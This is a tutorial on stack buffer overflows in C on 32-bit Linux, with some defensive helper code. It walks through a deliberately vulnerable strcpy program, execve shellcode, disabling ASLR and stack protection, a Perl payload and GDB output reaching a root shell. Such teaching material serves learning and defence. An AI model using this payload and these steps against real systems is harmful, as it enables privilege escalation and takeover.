Buffer Overflows Explained [Rev. A - 4/12/09] By: deLusion
Programmers need to keep security in mind whenever they write an application. Nearly every application is vulnerable in some form, and flaws in code are easily overlooked. Buffer overflows are among the most common attacks against applications, largely because the underlying bug is so easy to miss in the author's code. They are also very dangerous from a system security standpoint: an attacker who exploits one can execute arbitrary code, often with the aim of gaining root privileges on the system.
Buffers, also called arrays in C/C++, are contiguous blocks of memory for storing a specific data type. An example of a buffer is shown here:
CODE
char buffer[512];
The newly declared array, named buffer, has a storage type of char and 512 bytes of allocated storage space. A problem arises when more data is written to a buffer than it can hold and nothing checks the limit. This is what we call a buffer overflow: adjacent blocks of memory are overwritten because the write ran past the end of the buffer. In a *nix environment, a buffer overflow often ends in a segmentation fault, or segfault for short. Segmentation faults occur when an application accesses memory it is not allowed to, for example by writing to a read-only location or by jumping to an invalid address. On Windows, the same kind of error is reported as a STATUS_ACCESS_VIOLATION exception.
The most important thing to remember about buffer overflow vulnerabilities is that when one is exploited to spawn a shell, the shell only gets the permission level of the application that was exploited. In other words, the only way to obtain root access through a buffer overflow is for the exploited application to be running as root, as many system services do. The main ingredient of a successful exploit is the code to be executed, known as shellcode. Shellcode is made up of opcodes; opcodes, short for operation codes, are the machine-code instructions the processor executes. For simplicity's sake, I will not be showing you how to create your own shellcode from scratch, at least not in this article. I will be using sample shellcode provided by milw0rm for a simple shell spawn.
Machine code is system dependent: this shellcode is only designed to work in *nix x86 environments. If the provided shellcode doesn't work for you, take a look around on milw0rm, or any site that provides shellcode matching your system architecture.
CODE
\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80
The 22-byte shellcode presented is a set of instructions that executes a shell on the system. As said before, the spawned shell only gains the permissions that the application is running with.
The second most important part of a successful exploit is the NOP sled. NOP stands for No-OPeration: a machine instruction that does nothing except let the processor move on to the next instruction. Execution passes through a run of NOPs until it reaches the next real instructions, much like a stream flowing in one direction toward a larger body of water. On x86 the NOP opcode is the single byte 0x90, written "\x90", and NOPs are commonly used in buffer overflow exploits. A group of NOPs used this way is called a NOP sled, the name referring to how execution slides along it. If the return address points at any NOP in the group, execution slides forward until it reaches something else to execute, in our case the shellcode.
An exception to the NOP sled requirement is the use of environment variables. The environment variables of the current session can be listed with the env command. If the shellcode is stored in an environment variable, its exact location can be worked out by accounting for the length of the program's filename, so no sled is needed. However, this method will not be shown in detail in this article.
Last but not least, garbage data and a correct return address are required to complete a buffer overflow exploit. Garbage data is any data used to fill the rest of the buffer; it doesn't matter what it is as long as it contains no null byte, which would end the string. The return address is a value saved on the stack that is loaded into the instruction pointer register, EIP, when the function returns. EIP always holds the address of the next instruction to be executed. When a buffer on the stack is overflowed, the 4-byte saved return address is written over by our data, and that value ends up in EIP. This is very rewarding for us, because it gives us the power to choose where execution continues.
Before we start, we need to change a Linux security setting that randomizes the address space. Basic buffer overflows like this one require it to be disabled; more advanced techniques can get around this safety precaution. As root, enter the following command in bash:
CODE
echo 0 > /proc/sys/kernel/randomize_va_space
That’s all you need to change to make this basic buffer overflow work.
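To confirm the setting took effect, the value can be read back. The following is a minimal sketch, not part of the original walkthrough: the function names read_aslr_setting and aslr_description are made up for illustration, and the descriptions paraphrase the commonly documented meanings of the values 0, 1 and 2.

```c
#include <stdio.h>

/* Hypothetical helper: reads the integer stored in a procfs-style file
 * such as /proc/sys/kernel/randomize_va_space. Returns -1 if the file
 * cannot be opened or does not start with an integer. */
int read_aslr_setting(const char *path)
{
    FILE *fp = fopen(path, "r");
    int value = -1;

    if (fp == NULL)
        return -1;
    if (fscanf(fp, "%d", &value) != 1)
        value = -1;
    fclose(fp);
    return value;
}

/* Hypothetical helper: maps a setting value to a short description. */
const char *aslr_description(int value)
{
    switch (value) {
    case 0:  return "disabled";
    case 1:  return "stack, mmap and VDSO randomized";
    case 2:  return "stack, mmap, VDSO and heap randomized";
    default: return "unknown";
    }
}
```

Calling aslr_description(read_aslr_setting("/proc/sys/kernel/randomize_va_space")) from your own main() should report "disabled" after the echo command above has been run.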
Now that we know how all this works, how about we put it to good use? Let’s use this piece of vulnerable code just as an example:
vuln.c
CODE
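#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Deliberately vulnerable: strcpy() does not check the size of buffer. */
int copy(char *string) {
    char buffer[1024];
    strcpy(buffer, string);
    return 1;
}

int main(int argc, char *argv[]) {
    copy(argv[1]);
    return 1;
}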
Note: if you are using Ubuntu, you must pass these arguments to GCC when compiling:
CODE
-fno-stack-protector -z execstack
The first disables GCC's stack protection; the second allows code on the stack to be executed.
This code is not too complicated; I'm keeping this article basic. In this example we have a 1024-byte buffer inside the very insecure copy() function shown above. The function calls strcpy(), declared in the string.h header, which performs no bounds checking and will copy a string of any size from source to destination. As you have probably figured, this is not good at all, since it allows anyone to overflow the buffer array. Let's get started with this simple vulnerability.
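For contrast, here is a minimal sketch of what a bounds-checked copy could look like. It is not part of vuln.c; the name copy_checked and its return convention are assumptions made for illustration.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical safe counterpart to copy(): copies src into dst only if it
 * fits, including the terminating NUL. Returns 0 on success and -1 if src
 * is too long or an argument is invalid. */
int copy_checked(char *dst, size_t dst_size, const char *src)
{
    size_t len;

    if (dst == NULL || src == NULL || dst_size == 0)
        return -1;

    len = strlen(src);
    if (len >= dst_size)
        return -1;              /* would overflow: refuse instead of writing */

    memcpy(dst, src, len + 1);  /* len + 1 also copies the NUL terminator */
    return 0;
}
```

With a check like this in place of the bare strcpy() call, an oversized argument is rejected before a single byte is written past the end of the buffer.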
Here is the order in which you need to arrange your garbage data, NOPs, shellcode, and return address:
CODE
[ GARBAGE DATA ] -> [ NOP ] -> [ SHELLCODE ] -> [ RET ]
We now need to calculate the size of each field, excluding the return address, which is always 4 bytes.
Our buffer size is 1024 bytes, so we need to find out how much garbage data we're going to need. For good measure we're going to use 150 NOPs, so that if we are off on the return address, we have a higher chance of hitting the sled.
1024 - 150 = 874
The example shellcode is 22 bytes.
874 - 22 = 852
The 4-byte saved frame pointer (EBP) sits between the buffer and the saved return address and has to be overwritten before we reach it, so we are going to add 4 bytes.
852 + 4 = 856
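The same arithmetic can be written as a small model of the stack frame. This is only a sketch. It assumes a 32-bit x86 build in which the 4-byte saved frame pointer sits directly between the buffer and the return address, with no padding; the struct and function names are invented for illustration.

```c
#include <stddef.h>
#include <stdint.h>

enum {
    BUFFER_SIZE   = 1024, /* char buffer[1024] in copy() */
    NOP_COUNT     = 150,  /* length of the NOP sled */
    SHELLCODE_LEN = 22    /* length of the example shellcode */
};

/* Simplified model of copy()'s frame, lowest address first.
 * Assumption: no padding between buffer and the saved frame pointer. */
struct frame_model {
    char     buffer[BUFFER_SIZE];
    uint32_t saved_ebp;
    uint32_t return_address;
};

/* Filler bytes needed so that the NOPs and shellcode end right before RET. */
size_t filler_length(void)
{
    return offsetof(struct frame_model, return_address)
           - NOP_COUNT - SHELLCODE_LEN;
}

/* Total argument length: everything up to and including RET. */
size_t payload_length(void)
{
    return sizeof(struct frame_model);
}
```

Under these assumptions the return address sits at offset 1028, filler_length() gives the same 856 as the hand calculation, and the full argument is 1032 bytes long.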
Before we get started writing statements to exploit this application, I want to point this out:
CODE
delusion@deLusive:~/code/overflow$ ls -l
total 16
-rwxr-xr-x 1 root root 11997 2009-04-12 13:03 vuln
-rw-r--r-- 1 root root 212 2009-04-12 13:03 vuln.c
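The owner of the file is root. Keep in mind that ownership alone does not make a program run as root: it must be started by root or have the setuid bit set, which this listing does not show. In this walkthrough the application runs with root privileges, simulating the effect of a real-world service being attacked by a buffer overflow exploit.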
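File ownership and the set-user-ID bit are separate pieces of information in a file's metadata, and a quick check can tell them apart. The sketch below uses the standard stat() call; the helper names has_setuid_bit and is_setuid_root are made up for this example.

```c
#include <sys/stat.h>
#include <sys/types.h>

/* Returns 1 if the mode bits include set-user-ID, 0 otherwise. */
int has_setuid_bit(mode_t mode)
{
    return (mode & S_ISUID) != 0;
}

/* Returns 1 if the file at path is owned by root and has the set-user-ID
 * bit, 0 if not, and -1 if the file cannot be inspected. */
int is_setuid_root(const char *path)
{
    struct stat st;

    if (stat(path, &st) != 0)
        return -1;
    return st.st_uid == 0 && has_setuid_bit(st.st_mode);
}
```

A mode of -rwxr-xr-x corresponds to 0755, for which has_setuid_bit() returns 0; a setuid binary would appear as -rwsr-xr-x (04755) in ls -l.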
Moving on to the actual exploitation, we now know how much garbage data we need to fill most of the buffer. Let's write a quick Perl one-liner to build the whole argument for us, which we will then run in GDB, the GNU Debugger.
CODE
perl -e'print "A"x856,"\x90"x150,"\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","YYYY"'
Now we’re ready to use GDB to debug this. I set YYYY as the return address temporarily for debugging purposes.
CODE
delusion@deLusive:~/code/overflow$ gdb vuln -q
(gdb) run `perl -e'print "A"x856,"\x90"x150, "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","YYYY"'`
Starting program: /home/delusion/code/overflow/vuln `perl -e'print "A"x856,"\x90"x150, "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","YYYY"'`
Program received signal SIGSEGV, Segmentation fault.
0x59595959 in ?? ()
You might have been able to spot something already. 0x59 is the hex value of the character Y, so the four Y's are what ended up in EIP. Let's take a look at the registers.
CODE
(gdb) i r
eax 0x1 1
ecx 0xbfffeb38 -1073747144
edx 0x409 1033
ebx 0xb7fc1ff4 -1208213516
esp 0xbfffef40 0xbfffef40
ebp 0x80cde189 0x80cde189
esi 0xb8000ce0 -1207956256
edi 0x0 0
eip 0x59595959 0x59595959
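Register values in a dump like this can be mapped back to the bytes that were written to the stack. The helper below is a small sketch with an invented name, assuming a little-endian machine such as x86; it splits a 32-bit value into its bytes in memory order.

```c
#include <stdint.h>

/* Splits a 32-bit register value into its four bytes as they sit in
 * memory on a little-endian machine (lowest address first). */
void register_to_memory_bytes(uint32_t value, unsigned char out[4])
{
    out[0] = (unsigned char)(value & 0xff);
    out[1] = (unsigned char)((value >> 8) & 0xff);
    out[2] = (unsigned char)((value >> 16) & 0xff);
    out[3] = (unsigned char)((value >> 24) & 0xff);
}
```

Applied to the eip value 0x59595959 this gives four 0x59 bytes, the "YYYY" marker. Applied to the ebp value 0x80cde189 it gives 0x89 0xe1 0xcd 0x80, the last four bytes of the shellcode, which fits the saved frame pointer sitting just before the return address on the stack.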
As you can see, EIP was overwritten with 4 bytes of 'Y'. Now we need to find the general location of the NOP sled to get an approximate return address.
CODE
(gdb) x/200xb $esp
……
0xbffff4b8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff4c0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41
0xbffff4c8: 0x41 0x41 0x41 0x90 0x90 0x90 0x90 0x90
0xbffff4d0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4d8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4e0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4e8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4f0: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff4f8: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff500: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff508: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff510: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff518: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff520: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff528: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff530: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff538: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff540: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff548: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff550: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff558: 0x90 0x90 0x90 0x90 0x90 0x90 0x90 0x90
0xbffff560: 0x90 0xb0 0x0b 0x99 0x52 0x68 0x2f 0x2f
0xbffff568: 0x73 0x68 0x68 0x2f 0x62 0x69 0x6e 0x89
0xbffff570: 0xe3 0x52 0x53 0x89 0xe1 0xcd 0x80 0x59
0xbffff578: 0x59 0x59 0x59 0x00 0x43 0x50 0x4c 0x55
Notice where the NOPs end. The first byte after them is 0xb0, the beginning of our shellcode. The best thing to do is to pick a return address comfortably inside the sled, ideally toward the middle; I'll use 0xbffff4f0 for this example. The x86 architecture is little-endian, which is always a good thing to remember. This means that the least significant byte is stored first, so you need to write the bytes of that memory address in reverse order. Your return address is now going to be:
CODE
\xf0\xf4\xff\xbf
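Both steps, checking that the chosen address falls inside the sled and writing it out byte-reversed, can be sketched in a few lines of C. The function names are hypothetical. The sled start 0xbffff4cb used in the usage note is read off the memory dump above, where the first 0x90 appears.

```c
#include <stdint.h>
#include <stdio.h>

/* Returns 1 if addr lies inside a sled of sled_len bytes that starts
 * at sled_start, 0 otherwise. */
int address_in_sled(uint32_t addr, uint32_t sled_start, uint32_t sled_len)
{
    return addr >= sled_start && addr - sled_start < sled_len;
}

/* Writes addr as a little-endian escape string such as "\xf0\xf4\xff\xbf".
 * out must hold at least 17 bytes (16 characters plus the NUL). */
void format_return_address(uint32_t addr, char out[17])
{
    snprintf(out, 17, "\\x%02x\\x%02x\\x%02x\\x%02x",
             (unsigned)(addr & 0xff),
             (unsigned)((addr >> 8) & 0xff),
             (unsigned)((addr >> 16) & 0xff),
             (unsigned)((addr >> 24) & 0xff));
}
```

For this run, address_in_sled(0xbffff4f0, 0xbffff4cb, 150) returns 1, while 0xbffff561, the first shellcode byte, is already past the sled.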
Now you are all set to launch this attack on the vulnerable application.
CODE
(gdb) run `perl -e'print "A"x856,"\x90"x150, "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\xf0\xf4\xff\xbf"'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/delusion/code/overflow/vuln `perl -e'print "A"x856,"\x90"x150, "\xb0\x0b\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80","\xf0\xf4\xff\xbf"'`
Executing new program: /bin/bash
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
(no debugging symbols found)
sh-3.1# whoami
root
sh-3.1# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),17(audio),18(video),19(cdrom),26(tape),83(plugdev)
sh-3.1#
Now that wasn’t too hard, was it?
reference:r00tsecurity...